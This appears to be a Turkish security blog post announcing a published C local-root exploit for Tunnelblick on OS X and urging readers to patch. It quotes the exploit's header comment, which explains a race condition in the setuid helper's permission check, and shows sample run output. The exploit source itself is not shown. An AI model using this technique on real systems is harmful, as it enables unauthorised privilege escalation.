Tunnelblick Local Root exploit bin.sh uzantısından sonra c uzantılı exploitide yayınlandı. Local üzerinden root yetkisi full erişim veren exploit in yamasını hemen indirmeniz gerekmektedir.
* ==== Pwnnel Blicker ==== |
* ======================== |
* Tunnel Blick, a widely used OpenVPN manager for OSX |
* comes with a nice SUID executable that has more holes |
* than you care to count. It's a treasure chest of local |
* roots. I picked one that looked interesting, and here |
* we have Pwnnel Blicker. |
* Tunnel Blick will run any executable that has 744 |
* permissions and is owned by root:root. Probably we |
* could find a way to exploit an already existing 744 |
* executable, but this would be too easy. So instead, we |
* take advantage of a race condition between checking the |
* file permissions on the executable and actually running |
* [+] Creating vulnerable directory. |
* /Users/zx2c4/Library/Application Support/Tunnelblick/Configurations/pwnage.tblk |
* /Users/zx2c4/Library/Application Support/Tunnelblick/Configurations/pwnage.tblk/Contents |
* /Users/zx2c4/Library/Application Support/Tunnelblick/Configurations/pwnage.tblk/Contents/Resources |
* [+] Writing pid and executing vulnerable program. |
* /Users/zx2c4/Library/Application Support/Tunnelblick/Configurations/pwnage.tblk/Contents/Resources/
../../..//pwnage.tblk/Contents/Resources/exploit.pid
|
* [+] Complete. Run this again to get root. |
code
Bir önceki yazımız olan Tunnelblick Local Root Exploit başlıklı makalemizde local root exploit, OpenVpn local root exp ve Os Tunnelblick Local root hakkında bilgiler verilmektedir.
